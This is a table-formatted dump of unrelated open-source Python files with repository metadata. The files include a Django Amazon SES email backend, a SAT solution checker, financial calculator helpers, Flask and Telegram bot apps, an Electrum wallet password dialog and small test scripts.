code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from time import sleep
from django.core.mail.backends.base import BaseEmailBackend
from boto.regioninfo import RegionInfo
from boto.ses import SESConnection
from django_ses_backend import settings
# When changing this, remember to change it in setup.py
VERSION = (0, 1, 1)
__version__ = '.'.join([str(x) for x in VERSION])
__author__ = 'Harry Marr & Piotr Buliński'
__all__ = ('SESBackend',)
# These would be nice to make class-level variables, but the backend is
# re-created for each outgoing email/batch.
# recent_send_times also is not going to work quite right if there are multiple
# email backends with different rate limits returned by SES, but that seems
# like it would be rare.
cached_rate_limits = {}
recent_send_times = []
class SESBackend(BaseEmailBackend):
"""A Django Email backend that uses Amazon's Simple Email Service.
"""
def __init__(self, fail_silently=False, aws_access_key=None,
aws_secret_key=None, aws_region_name=None,
aws_region_endpoint=None, aws_auto_throttle=None,
**kwargs):
super(SESBackend, self).__init__(fail_silently=fail_silently, **kwargs)
self._access_key_id = aws_access_key or settings.AWS_SES_ACCESS_KEY_ID
self._access_key = aws_secret_key or settings.AWS_SES_SECRET_ACCESS_KEY
self._region = RegionInfo(
name=aws_region_name or settings.AWS_SES_REGION_NAME,
endpoint=aws_region_endpoint or settings.AWS_SES_REGION_ENDPOINT)
self._throttle = aws_auto_throttle or settings.AWS_SES_AUTO_THROTTLE
self.connection = None
def open(self):
"""Create a connection to the AWS API server. This can be reused for
sending multiple emails.
"""
if self.connection:
return False
try:
self.connection = SESConnection(
aws_access_key_id=self._access_key_id,
aws_secret_access_key=self._access_key,
region=self._region,
)
except:
if not self.fail_silently:
raise
def close(self):
"""Close any open HTTP connections to the API server.
"""
try:
self.connection.close()
self.connection = None
except:
if not self.fail_silently:
raise
def send_messages(self, email_messages):
"""Sends one or more EmailMessage objects and returns the number of
email messages sent.
"""
if not email_messages:
return
new_conn_created = self.open()
if not self.connection:
# Failed silently
return
num_sent = 0
source = settings.AWS_SES_RETURN_PATH
for message in email_messages:
# Automatic throttling. Assumes that this is the only SES client
# currently operating. The AWS_SES_AUTO_THROTTLE setting is a
# factor to apply to the rate limit, with a default of 0.5 to stay
# well below the actual SES throttle.
# Set the setting to 0 or None to disable throttling.
if self._throttle:
global recent_send_times
now = datetime.now()
# Get and cache the current SES max-per-second rate limit
# returned by the SES API.
rate_limit = self.get_rate_limit()
# Prune from recent_send_times anything more than a few seconds
# ago. Even though SES reports a maximum per-second, the way
# they enforce the limit may not be on a one-second window.
# To be safe, we use a two-second window (but allow 2 times the
# rate limit) and then also have a default rate limit factor of
# 0.5 so that we really limit the one-second amount in two
# seconds.
window = 2.0 # seconds
window_start = now - timedelta(seconds=window)
new_send_times = []
for time in recent_send_times:
if time > window_start:
new_send_times.append(time)
recent_send_times = new_send_times
# If the number of recent send times in the last 1/_throttle
# seconds exceeds the rate limit, add a delay.
# Since I'm not sure how Amazon determines at exactly what
# point to throttle, better be safe than sorry and let in, say,
# half of the allowed rate.
if len(new_send_times) > rate_limit * window * self._throttle:
# Sleep the remainder of the window period.
delta = now - new_send_times[0]
total_seconds = (delta.microseconds + (delta.seconds +
delta.days * 24 * 3600) * 10**6) / 10**6
delay = window - total_seconds
if delay > 0:
sleep(delay)
recent_send_times.append(now)
# end of throttling
try:
response = self.connection.send_raw_email(
source=source or message.from_email,
destinations=message.recipients(),
raw_message=message.message().as_string())
message.extra_headers['status'] = 200
message.extra_headers['message_id'] = response[
'SendRawEmailResponse']['SendRawEmailResult']['MessageId']
message.extra_headers['request_id'] = response[
'SendRawEmailResponse']['ResponseMetadata']['RequestId']
num_sent += 1
except SESConnection.ResponseError as err:
# Store failure information so to post process it if required
error_keys = ['status', 'reason', 'body', 'request_id',
'error_code', 'error_message']
for key in error_keys:
message.extra_headers[key] = getattr(err, key, None)
if not self.fail_silently:
raise
if new_conn_created:
self.close()
return num_sent
def get_rate_limit(self):
if self._access_key_id in cached_rate_limits:
return cached_rate_limits[self._access_key_id]
new_conn_created = self.open()
if not self.connection:
raise Exception(
"No connection is available to check current SES rate limit.")
try:
quota_dict = self.connection.get_send_quota()
max_per_second = quota_dict['GetSendQuotaResponse'][
'GetSendQuotaResult']['MaxSendRate']
ret = float(max_per_second)
cached_rate_limits[self._access_key_id] = ret
return ret
finally:
if new_conn_created:
self.close()
|
piotrbulinski/django-ses-backend
|
django_ses_backend/__init__.py
|
Python
|
mit
| 7,068
|
#!/usr/bin/env python
import sys
with open(sys.argv[2]) as f:
try:
sol = [int(x) for x in f.readline().split()]
if sol == [0]:
print("No satisfying valuation found")
sys.exit(1)
assert all(-x not in sol for x in sol)
except (ValueError, AssertionError):
print("Malformed solution")
sys.exit(2)
with open(sys.argv[1]) as f:
for l in f.xreadlines():
if len(l) == 0 or l[0] == 'c':
continue
if l[0] == 'p':
_, _, n, _ = l.split()
try:
n = int(n)
except ValueError:
print("Malformed formula")
sys.exit(3)
if len(sol) > 0 and (min(sol) < -n or max(sol) > n):
print("The solution has too many atoms")
sys.exit(2)
else:
try:
if not any(int(x) in sol for x in l.split()):
print("The solution is incorrect")
sys.exit(1)
except ValueError:
print("Malformed formula")
sys.exit(3)
print("The solution is correct")
|
jaanos/LVR-2016
|
homework/common/check-janos.py
|
Python
|
mit
| 1,157
|
from __future__ import absolute_import, print_function, unicode_literals
import json
import contextlib
from ._utils import indent
@contextlib.contextmanager
def formatter(stream):
stream.write("{\n")
yield JSONFormatter(stream)
stream.write("\n}\n")
stream.flush()
class JSONFormatter(object):
def __init__(self, stream):
self._stream = stream
self._open = False
def _open_property(self, name):
if self._open:
self._stream.write(",\n")
self._stream.write(" " + json.dumps(name) + ": ")
self._open = True
def _write_property(self, name, value):
self._open_property(name)
self._stream.write(json.dumps(value))
def write_platform(self, platform):
self._write_property("platform", platform)
def write_runner(self, runner):
self._write_property("runner", runner)
def write_stub(self, args):
self._write_property("stub", args)
@contextlib.contextmanager
def tests(self):
self._open_property("tests")
self._stream.write("[\n")
yield JSONFormatter(self._stream)
self._stream.write("\n ]")
def write_test(self, test, result):
if self._open:
self._stream.write(",\n")
self._stream.flush()
obj = {
"result": result.name,
"description": test.description,
"target": "{} {}".format("accept" if test.accept else "reject", test.name),
}
reason = result.reason.rstrip()
if reason:
obj["reason"] = reason
details = result.details.rstrip()
if details:
obj["details"] = details
self._stream.write(indent(json.dumps(obj, indent=4), 8))
self._stream.flush()
self._open = True
|
ouspg/trytls
|
runners/trytls/formatters/json.py
|
Python
|
mit
| 1,815
|
"""
calculator.py
General functions that would be in a finacial calculator.
"""
import numpy as np
# Typical Financial Calculator Functions
# ------------------------------------------------------------------------------------------------------------------------------
def future_value(pv=100.0, r=0.07, n=1.0, f=1.0):
"""
Calculate the future value of pv present value after compounding for n periods at r rate every f frequency.
"""
return pv * np.exp(1.0 + r / f, n * f)
def present_value(fv=100.0, r=0.07, n=1.0, f=1.0):
"""
Calculate the present value of fv future value before compounding for n periods at r rate every f frequency.
"""
return fv / np.exp(1.0 + r / f, n * f)
def rate(fv=100.0, pv=90.0, n=1.0, f=1.0):
"""
Calculate the rate needed to compound a pv present value into a fv future value compounding over n periods every f
frequency.
"""
return f * np.power(fv / pv, 1.0 / (n * f)) - 1.0
def periods(fv=0.0, pv=0.0, r=0.0, f=0.0):
"""
Calculate the period needed to compound a pv present value into a fv future value compounding at r rate every f frequency.
"""
return np.log(fv / pv) / (f * np.log(1.0 + r / f))
def effective_return(r=0.07, f=2.0):
"""
Calculate the annual rate needed to equal an r rate at f frequency.
"""
return np.power(1.0 + (r / f), f) - 1.0
def annual_return(r=0.07, f=1.0):
"""
Calculate annual return from semiannual return.
"""
return np.power(1.0 + r, f) - 1.0
def inflation_adjusted(r=0.07, i=0.03):
"""
Calculate inflation adjusted returns.
"""
return (1.0 + r) / (1.0 + i) - 1.0
def gain(xi=100.0, xf=110.0):
"""
Calculate gain from intial to final value.
"""
return (xf - xi) / xi
def amortization(p=1000.0, r=0.05, n=10.0, f=1.0):
"""
Calculate periodic payments needed to pay off p principle at r rate over n periods every f frequency.
"""
return p * (r / f) / (1.0 - np.power(1.0 + r / f, -f*n))
def cagr(xi=100.0, xf=110.0, n=1.0):
"""
Calculate compund annual growth rate.
"""
return np.power(xf / xi, 1.0 / n) - 1.0
def length_of_payment(b=1000.0, p=100.0, apr=0.18):
"""
Calculate the length of payments of b balance with p payment at apr APR.
"""
i = apr / 30.0
return (-1.0 / 30.0) * np.log(1.0 + (b / p)*(1.0 - np.power(1.0 + i, 30.0))) / np.log(1.0 + i)
def annuity(p=100.0, r=0.07, n=10.0, f=1.0):
"""
Calculate future value based on periodic p investment payment at r rate over n periods every f frequency - check this
formula.
"""
return p * ((np.power(1.0 + r / f, n * f) - 1.0) / r / f)
|
tmthydvnprt/compfipy
|
compfipy/calculator.py
|
Python
|
mit
| 2,674
|
import math
tri = [
[ 75 ],
[ 95, 64 ],
[ 17, 47, 82 ],
[ 18, 35, 87, 10 ],
[ 20, 4, 82, 47, 65 ],
[ 19, 1, 23, 75, 3, 34 ],
[ 88, 2, 77, 73, 7, 63, 67 ],
[ 99, 65, 4, 28, 6, 16, 70, 92 ],
[ 41, 41, 26, 56, 83, 40, 80, 70, 33 ],
[ 41, 48, 72, 33, 47, 32, 37, 16, 94, 29 ],
[ 53, 71, 44, 65, 25, 43, 91, 52, 97, 51, 14 ],
[ 70, 11, 33, 28, 77, 73, 17, 78, 39, 68, 17, 57 ],
[ 91, 71, 52, 38, 17, 14, 91, 43, 58, 50, 27, 29, 48 ],
[ 63, 66, 4, 68, 89, 53, 67, 30, 73, 16, 69, 87, 40, 31 ],
[ 4, 62, 98, 27, 23, 9, 70, 98, 73, 93, 38, 53, 60, 4, 23 ]
]
best = 0
for row in range(1, len(tri)):
for col in range(len(tri[row])):
#print("%d, %d" % (row, col))
left = tri[row-1][col-1] if col else 0
right = tri[row-1][col] if len(tri[row-1]) > col else 0
tri[row][col] += max(left, right)
best = max(best, tri[row][col])
print("\n".join(str(i) for i in tri))
print(best)
|
jokkebk/euler
|
p18.py
|
Python
|
mit
| 1,040
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 23 10:11:53 2016
@author: ddboline
flask app for make_queue
"""
from __future__ import (absolute_import, division, print_function, unicode_literals)
from movie_collection_app.movie_queue_flask import run_make_queue_flask
if __name__ == '__main__':
run_make_queue_flask()
|
ddboline/movie_collection_app
|
make_queue_flask.py
|
Python
|
mit
| 348
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from electrum_dgb.i18n import _
from util import *
import re
import math
def check_password_strength(password):
'''
Check the strength of the password entered by the user and return back the same
:param password: password entered by user in New Password
:return: password strength Weak or Medium or Strong
'''
password = unicode(password)
n = math.log(len(set(password)))
num = re.search("[0-9]", password) is not None and re.match("^[0-9]*$", password) is None
caps = password != password.upper() and password != password.lower()
extra = re.match("^[a-zA-Z0-9]*$", password) is None
score = len(password)*( n + caps + num + extra)/20
password_strength = {0:"Weak",1:"Medium",2:"Strong",3:"Very Strong"}
return password_strength[min(3, int(score))]
PW_NEW, PW_CHANGE, PW_PASSPHRASE = range(0, 3)
class PasswordLayout(object):
titles = [_("Enter Password"), _("Change Password"), _("Enter Passphrase")]
def __init__(self, wallet, msg, kind, OK_button):
self.wallet = wallet
self.pw = QLineEdit()
self.pw.setEchoMode(2)
self.new_pw = QLineEdit()
self.new_pw.setEchoMode(2)
self.conf_pw = QLineEdit()
self.conf_pw.setEchoMode(2)
self.kind = kind
self.OK_button = OK_button
vbox = QVBoxLayout()
label = QLabel(msg + "\n")
label.setWordWrap(True)
grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnMinimumWidth(0, 150)
grid.setColumnMinimumWidth(1, 100)
grid.setColumnStretch(1,1)
if kind == PW_PASSPHRASE:
vbox.addWidget(label)
msgs = [_('Passphrase:'), _('Confirm Passphrase:')]
else:
logo_grid = QGridLayout()
logo_grid.setSpacing(8)
logo_grid.setColumnMinimumWidth(0, 70)
logo_grid.setColumnStretch(1,1)
logo = QLabel()
logo.setAlignment(Qt.AlignCenter)
logo_grid.addWidget(logo, 0, 0)
logo_grid.addWidget(label, 0, 1, 1, 2)
vbox.addLayout(logo_grid)
m1 = _('New Password:') if kind == PW_NEW else _('Password:')
msgs = [m1, _('Confirm Password:')]
if wallet and wallet.has_password():
grid.addWidget(QLabel(_('Current Password:')), 0, 0)
grid.addWidget(self.pw, 0, 1)
lockfile = ":icons/lock.png"
else:
lockfile = ":icons/unlock.png"
logo.setPixmap(QPixmap(lockfile).scaledToWidth(36))
grid.addWidget(QLabel(msgs[0]), 1, 0)
grid.addWidget(self.new_pw, 1, 1)
grid.addWidget(QLabel(msgs[1]), 2, 0)
grid.addWidget(self.conf_pw, 2, 1)
vbox.addLayout(grid)
# Password Strength Label
if kind != PW_PASSPHRASE:
self.pw_strength = QLabel()
grid.addWidget(self.pw_strength, 3, 0, 1, 2)
self.new_pw.textChanged.connect(self.pw_changed)
def enable_OK():
OK_button.setEnabled(self.new_pw.text() == self.conf_pw.text())
self.new_pw.textChanged.connect(enable_OK)
self.conf_pw.textChanged.connect(enable_OK)
self.vbox = vbox
def title(self):
return self.titles[self.kind]
def layout(self):
return self.vbox
def pw_changed(self):
password = self.new_pw.text()
if password:
colors = {"Weak":"Red", "Medium":"Blue", "Strong":"Green",
"Very Strong":"Green"}
strength = check_password_strength(password)
label = (_("Password Strength") + ": " + "<font color="
+ colors[strength] + ">" + strength + "</font>")
else:
label = ""
self.pw_strength.setText(label)
def old_password(self):
if self.kind == PW_CHANGE:
return unicode(self.pw.text()) or None
return None
def new_password(self):
pw = unicode(self.new_pw.text())
# Empty passphrases are fine and returned empty.
if pw == "" and self.kind != PW_PASSPHRASE:
pw = None
return pw
class PasswordDialog(WindowModalDialog):
def __init__(self, parent, wallet, msg, kind):
WindowModalDialog.__init__(self, parent)
OK_button = OkButton(self)
self.playout = PasswordLayout(wallet, msg, kind, OK_button)
self.setWindowTitle(self.playout.title())
vbox = QVBoxLayout(self)
vbox.addLayout(self.playout.layout())
vbox.addStretch(1)
vbox.addLayout(Buttons(CancelButton(self), OK_button))
def run(self):
if not self.exec_():
return False, None, None
return True, self.playout.old_password(), self.playout.new_password()
|
protonn/Electrum-Cash
|
gui/qt/password_dialog.py
|
Python
|
mit
| 6,019
|
# coding: utf-8
from flask import Flask, render_template, request, redirect, url_for
from sqlalchemy import Column, Integer, create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from pyuploadcare_sqlalchemy import ImageType
from pyuploadcare import conf
app = Flask(__name__)
conf.pub_key = 'demopublickey'
conf.secret = 'demoprivatekey'
Base = declarative_base()
class Photo(Base):
__tablename__ = 'photo'
id = Column(Integer, primary_key=True)
photo = Column(ImageType(effects='-/resize/x100/'))
engine = create_engine('sqlite:///db.sqlite')
Session = sessionmaker(bind=engine)
Base.metadata.create_all(engine)
@app.route('/')
def index():
session = Session()
items = session.query(Photo).all()
session.close()
return render_template('index.html', items=items)
@app.route('/add', methods=['POST'])
def add_photo():
session = Session()
photo = Photo(photo=request.form['my_file'])
session.add(photo)
session.commit()
session.close()
return redirect(url_for('index'))
if __name__ == "__main__":
app.run(debug=True)
|
uploadcare/pyuploadcare-sqlalchemy
|
example/main.py
|
Python
|
mit
| 1,144
|
#!/usr/bin/python3
import threading
import time
class Scale(threading.Thread):
"""This Scale is a debugging tool for use when real scales are unavailable.
Each instance of Scale launches a thread which generates dummy output
and saves that input to an entry in a dict.
Args:
comPort: string; name of a COM port.
container: dict; shared memory for use by all Scale threads.
index: string; used to identify the scale.
"""
def __init__(self, comPort, container, index):
threading.Thread.__init__(self, daemon=True)
self.comPort = comPort
self._stop = threading.Event()
self.container = container
self.index = index
self.cycle = 0
def run(self):
"""Dummy output data loop."""
ID = chr(ord('A') + self.index)
while not self.stopped():
time.sleep(.5)
value = ID + str(self.cycle)
self.container[ID] = value
self.cycle += 1
# is a stop function necessary if thread runs as daemon?
# maybe necessary to close the serial port?
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.isSet()
|
bretter/SpudScale
|
src/TestScale.py
|
Python
|
mit
| 1,200
|
from wonderbot import main
if __name__ == '__main__':
from apscheduler.schedulers.blocking import BlockingScheduler
sched = BlockingScheduler()
sched.add_job(main, 'interval', id='wonderbot', seconds=120)
sched.start()
|
jmwerner/__WonderBot__
|
scheduler.py
|
Python
|
mit
| 240
|
#!/usr/bin/env python
import sys
import logging
import time
import telepot
import json
import commandmanager
reload(sys).setdefaultencoding('utf-8')
logging.basicConfig(filename='telegramadmin.log')
class TelegramAdmin:
def __init__(self):
self.log = logging.getLogger('telegramadmin')
self.config_data = {}
self.bot = None
self.command_list = None
self.command_manager = None
def main_loop(self):
self.bot.message_loop({'chat': self.on_chat_message,
'callback_query': self.on_callback_query})
self.log.info('Listening...')
while 1:
time.sleep(10)
def on_chat_message(self, msg):
content_type, chat_type, chat_id = telepot.glance(msg)
if content_type == 'text':
self.log.info('message received %s' % msg['text'])
self.command_manager.execute_command_message(chat_id, msg['text'])
def on_callback_query(self, msg):
query_id, from_id, query_data = telepot.glance(msg,
flavour='callback_query')
def init(self):
with open('config.json') as json_config_file:
self.config_data = json.load(json_config_file)
TOKEN = self.config_data['token']
self.bot = telepot.Bot(TOKEN)
success = False
while not success:
success = True
try:
self.bot.sendMessage(self.config_data['uid'],'Ok, sono online!')
except:
success = False
self.log.error('Impossible to send message... retry in 10 seconds')
time.sleep(10)
self.command_manager = \
commandmanager.CommandManager(self.bot, self.config_data)
try:
self.command_manager.load_handlers()
except Exception as e:
self.log.error(e)
print 'Error importing modules, see logfiles for more infos'
exit()
if __name__ == "__main__":
server = TelegramAdmin()
server.init()
server.main_loop()
|
miciux/telegram-bot-admin
|
telegramadmin.py
|
Python
|
mit
| 2,107
|
from .sub_sample_2_1 import (
sub_sample_2_1_now, sub_sample_2_1_sleep,
sub_sample_2_1_time, sub_sample_2_1_today
)
__all__ = [
"sub_sample_2_1_now", "sub_sample_2_1_sleep",
"sub_sample_2_1_time", "sub_sample_2_1_today"
]
|
alisaifee/hiro
|
tests/emulated_modules/sub_module_2/__init__.py
|
Python
|
mit
| 239
|
import matplotlib.pyplot as plt
import UpDownMethods as ud
def plot_results(results, midpoints=False, figure=None, estimate=False,
reversals=False, runs=True):
if figure is None:
figure = plt.figure()
figure.clf()
figure.add_subplot(111)
plt.hold(True)
# Plot correct responses
corr = results[results['Responses'] == True]
if len(corr) > 0:
plt.scatter(corr.index+1, corr.Value, s=50, marker='+', c='k')
# Plot incorrect responses
incorr = results[results['Responses'] == False]
if len(incorr) > 0:
plt.scatter(incorr.index+1, incorr.Value, s=50, marker='_', c='k')
# Indicate reversals
if reversals:
reversal = results[results['Reversal'] == True]
if len(reversal) > 0:
plt.scatter(reversal.index+1, reversal.Value, facecolors='none',
edgecolors='k', s=200)
# Track the runs
if runs is not False:
runs = ud.runs(results)
for i in range(len(runs)):
r = runs.iloc[[i]]
start = r["Start"]
end = r["Finish"]
mid = start + (end-start)/2
runY = min(results.Value)-1
plt.errorbar(mid, runY, xerr=(end-start)/2, c='k')
plt.annotate(str(int(i+1)), xy=(mid, runY-0.5), xytext=(mid, runY-0.5))
if estimate is not False:
est = ud.estimate_reversals(results, num=estimate)
if est is not None:
plt.axhline(y=est, ls='--')
plt.text(0, est+0.05, "Estimate = " + str(est), fontsize=12)
if midpoints:
mids = ud.midpoints(results)
for i in range(len(mids)):
plt.scatter(mids['CentreTrial'].values[i],
mids['Midpoint'].values[i], c='r')
if len(results) > 0:
plt.xlim(-0.5, max(results.index) + 2.5)
plt.ylabel('Stimulus Value', fontsize=14)
plt.xlabel('Trial Number', fontsize=14)
return figure
|
codles/UpDownMethods
|
UpDownMethods/plot.py
|
Python
|
mit
| 1,966
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
def set_themes(apps, schema_editor):
Theme = apps.get_model("themes", "Theme")
default_theme = Theme.objects.get(is_default=True)
HomePage = apps.get_model('core', 'HomePage')
home, created = HomePage.objects.get_or_create(
slug="home"
)
home.theme_id = default_theme.id
home.save()
class Migration(migrations.Migration):
dependencies = [
('core', '0019_set_contact_email'),
('themes', '0006_create_themes'),
]
operations = [
migrations.RunPython(set_themes),
]
|
OpenCanada/website
|
core/migrations/0020_assign_theme_to_homepage.py
|
Python
|
mit
| 653
|
#
# mainTab
#
tab = self.notebook.mainTab
tab.settings['Program'] = 'castep'
tab.settings['Output file name'] = 'phonon.castep'
#
# SettingsTab
#
tab = self.notebook.settingsTab
tab.settings['Eckart flag'] = False
tab.settings['Neutral Born charges'] = False
tab.settings['Sigma value'] = 5
tab.settings['Mass definition'] = 'program'
#
# 0th Scenario tabs
#
tab = self.notebook.scenarios[0]
tab.settings['Matrix'] = 'ptfe'
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['Volume fraction'] = 0.1
tab.settings['Ellipsoid a/b'] = 0.5
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Effective medium method'] = 'Mie'
tab.settings['Particle shape'] = 'Sphere'
tab.settings['Particle size(mu)'] = 1.0
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Legend'] = 'Mie single particle size 1.0mu'
# Add new scenarios
methods = ['Mie']
shapes = ['Sphere']
hkls = [[0,0,0]]
vfs = [0.1]
sizes = [1.0, 1.0, ]
sigmas = [0.1, 0.5, ]
for method in methods:
for shape,hkl in zip(shapes,hkls):
for vf in vfs:
for size,sigma in zip(sizes,sigmas):
self.notebook.addScenario()
tab = self.notebook.scenarios[-1]
tab.settings['Volume fraction'] = vf
tab.settings['Particle shape'] = shape
tab.settings['Particle size(mu)'] = size
tab.settings['Effective medium method'] = method
tab.settings['Particle size distribution sigma(mu)'] = sigma
tab.settings['Unique direction - h'] = hkl[0]
tab.settings['Unique direction - k'] = hkl[1]
tab.settings['Unique direction - l'] = hkl[2]
#tab.settings['Legend'] = method + ' ' + shape + ' vf='+str(vf)+' size='+str(size)+' sigma=',str(sigma)
tab.settings['Legend'] = method + ' vf='+str(vf)+' size='+str(size)+' sigma='+str(sigma)
#
# Plotting Tab
#
tab = self.notebook.plottingTab
tab.settings['Minimum frequency'] = 300.0
tab.settings['Maximum frequency'] = 800.0
tab.settings['Frequency increment'] = 0.2
tab.settings['Molar definition'] = 'Unit cells'
tab.settings['Plot title'] = 'Mie method - Castep MgO - LogNormal Distribution'
#
# Analysis Tab
#
tab = self.notebook.analysisTab
tab.settings['Minimum frequency'] = -1
tab.settings['Maximum frequency'] = 800
tab.settings['title'] = 'Analysis'
tab.settings['Covalent radius scaling'] = 1.1
tab.settings['Bonding tolerance'] = 0.1
tab.settings['Bar width'] = 0.5
#
|
JohnKendrick/PDielec
|
Examples/Mie/MgO_lognormal/script.py
|
Python
|
mit
| 2,598
|
from setuptools import setup
setup(name='PyYacht',
version='0.2',
description='Yacht race starter',
url='https://github.com/HUg0005/PyYacht',
author='Hayden Hughes',
author_email='mrhaydenhughes@gmail.com',
license='MIT',
scripts=['bin/PyStart.py'],
zip_safe=False)
|
HUg0005/PyYacht
|
setup.py
|
Python
|
mit
| 324
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-05 15:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rank', '0005_systemmessage'),
]
operations = [
migrations.AddField(
model_name='systemmessage',
name='name',
field=models.CharField(default='test', max_length=100),
preserve_default=False,
),
]
|
dreardon/leaderboard
|
rank/migrations/0006_systemmessage_name.py
|
Python
|
mit
| 499
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see LICENSE.txt for details)
# -----------------------------------------------------------------------------
"""Setup script for spyder_vim"""
# Standard library imports
import ast
import os
# Third party imports
from setuptools import find_packages, setup
HERE = os.path.abspath(os.path.dirname(__file__))
def get_version(module='spyder_vim'):
"""Get version."""
with open(os.path.join(HERE, module, '__init__.py'), 'r') as f:
data = f.read()
lines = data.split('\n')
for line in lines:
if line.startswith('VERSION_INFO'):
version_tuple = ast.literal_eval(line.split('=')[-1].strip())
version = '.'.join(map(str, version_tuple))
break
return version
def get_description():
"""Get long description."""
with open(os.path.join(HERE, 'README.rst'), 'r') as f:
data = f.read()
return data
REQUIREMENTS = ['spyder>=3.2.0']
setup(
name='spyder-vim',
version=get_version(),
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
keywords=['Spyder', 'Plugin', 'Vim'],
url='https://github.com/spyder-ide/spyder-vim',
license='MIT',
author='Joseph Martinot-Lagarde',
author_email='contrebasse@gmail.com',
description='A plugin to enable vim keybingins to the spyder editor',
long_description=get_description(),
install_requires=REQUIREMENTS,
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: X11 Applications :: Qt',
'Environment :: Win32 (MS Windows)',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development :: Widget Sets'])
|
Nodd/spyderplugins.vim
|
setup.py
|
Python
|
mit
| 2,136
|
#Finish the solution so that it sorts the passed in array of numbers. If the function passes in an empty array or null/nil value then it should return an empty array.
def solution(nums):
return sorted(nums) if nums else []
#Alternate Solution
def solution(nums):
if not nums:
return []
return sorted(nums)
|
JLJTECH/TutorialTesting
|
CodeWars/2016/SortNumbers-7k.py
|
Python
|
mit
| 326
|
import rethinkdb as r
from tornado import gen
from tornado import ioloop
import random
r.set_loop_type("tornado")
connection = r.connect(host='localhost', port=28015)
|
peymanmortazavi/quantifiedSelf
|
lib/database.py
|
Python
|
mit
| 168
|
# -*- coding: utf-8 -*-
import datetime
import requests
from pytz import timezone
from django.conf import settings
def get_tz(geoid):
if settings.USE_LOCAL_GEOBASE:
return settings.DB.regionById(int(geoid)).as_dict['tzname']
try:
return requests.get(settings.GEOBASE_API,
params={'id': geoid},
headers={"Authorization": "anytask"}
).json()['tzname']
except: # noqa
return settings.TIME_ZONE
def convert_datetime(date_time, from_time_zone, to_time_zone=settings.TIME_ZONE):
return timezone(from_time_zone).localize(date_time.replace(tzinfo=None)).\
astimezone(timezone(to_time_zone))
def get_datetime_with_tz(value, geoid, user):
value = datetime.datetime.strptime(value, '%d-%m-%Y %H:%M')
if geoid:
tz = get_tz(geoid)
else:
tz = user.profile.time_zone or settings.TIME_ZONE
return convert_datetime(value, tz)
|
znick/anytask
|
anytask/common/timezone.py
|
Python
|
mit
| 981
|
import sys
import os
brief = "test a model"
aliases = ['m']
def usage(argv0):
print("Usage: {} test model MODEL_NAME|--list|--help".format(argv0))
sys.exit(1)
alias = ['m']
def execute(argv, argv0, engine):
if not argv or '--help' in argv:
usage(argv0)
os.environ["AIOWEB_ENV"] = "test"
environment = os.getenv("AIOWEB_ENV", "development")
os.environ.setdefault("AIOWEB_SETTINGS_MODULE", "settings")
import lib
from aioweb import settings
tests_dir = lib.dirs(settings, format=["tests_models"], check=True)
if not tests_dir:
print("No model found!")
sys.exit(0)
if '--list' in argv:
[print(m[:-3]) for m in os.listdir(tests_dir) if m.endswith(".py") and not m.startswith("__")]
sys.exit(0)
test_file = os.path.join(tests_dir, lib.names(argv[0] + ".py", format=["model"]))
if not os.path.exists(test_file):
print("No such file: " + test_file)
sys.exit(1)
os.system("python3 " + test_file)
|
kreopt/aioweb
|
wyrm/modules/test/model.py
|
Python
|
mit
| 1,012
|
import mock
import subprocess
from linkins import script
from linkins.test import util
@mock.patch('multiprocessing.Process')
@mock.patch('linkins.script.log')
@mock.patch('subprocess.Popen')
def test_runscript_simple(fakepopen, fakelog, fakeprocess):
proc = fakepopen.return_value
poll = proc.poll
poll.return_value = 0
read = proc.stdout.read
read.side_effect = iter('foo\n')
script.runscript('/foo/bar')
popen = util.mock_call_with_name(
'',
['/foo/bar'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
read = mock.call().stdout.read(1)
reads = [read]*5
close = mock.call().stdout.close()
out_log = util.mock_call_with_name(
'info',
'foo',
extra={'source': 'SCRIPT', 'script': 'bar'},
)
popen_calls = [
popen,
]
popen_calls += reads
popen_calls.append(close)
log_calls = [
out_log,
]
assert fakepopen.mock_calls == popen_calls
assert fakelog.mock_calls == log_calls
